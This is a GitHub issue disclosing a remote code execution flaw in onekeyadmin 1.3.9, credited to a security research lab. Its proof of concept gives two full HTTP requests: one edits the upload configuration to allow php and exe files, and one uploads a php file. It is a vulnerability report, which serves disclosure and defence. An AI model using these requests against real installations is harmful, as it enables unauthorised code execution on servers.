Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote code execution caused by uploading arbitrary files in the background #1

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment

Comments

@qbz95aaa
Copy link

qbz95aaa commented Jan 10, 2023

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:Remote code execution
Vulnerability Details:
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location
Vulnerability occurs in
app\admin\controller\File#upload Although there are restrictions on ext
image
but we found
The app\admin\controller\Config#update method can update the limit
image
image
Vulnerability recurrence
Conditions Admin
poc
The first step is to update the configuration to allow uploading php files
`POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: /
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close

------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"

templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php

------WebKitFormBoundaryARP8fRC2kb4GP3oP--
`
image
image

@qbz95aaa
Copy link
Author

find by Chaitin Security Research Lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant